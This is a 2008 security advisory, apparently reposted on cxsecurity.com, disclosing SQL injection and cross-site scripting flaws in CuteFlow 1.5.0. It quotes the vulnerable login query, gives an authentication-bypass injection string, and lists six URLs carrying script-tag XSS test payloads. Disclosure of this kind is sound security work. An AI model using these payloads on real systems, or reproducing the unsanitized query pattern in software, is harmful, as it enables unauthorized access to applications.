CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities

2008.04.02
Credit: hadihadi
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

######################################################################## # # # CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities # # [sql injection & Xss] # ######################################################################## Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) sql vuln code in login.php: $query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'"; ----------------------- the login forme included in index.php you must login in index.php ;) vuln: login:admin ' or 1=1/* password:whatever ------------------------------------- and you can see xss vuln too here: /page/showcirculation.php?language=<script>alert(1111)</script> /pages/edittemplate_step2.php?language=<script>alert(1111)</script> /pages/showfields.php?language=<script>alert(1111)</script>> /pages/showuser.php?language=<script>alert(1111)</script> /pages/editmailinglist_step1.php?language=<script>alert(222)</script> /pages/showtemplates.php?language=<script>alert(1111)</script> ------------------------- tnx all h4ck3rz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top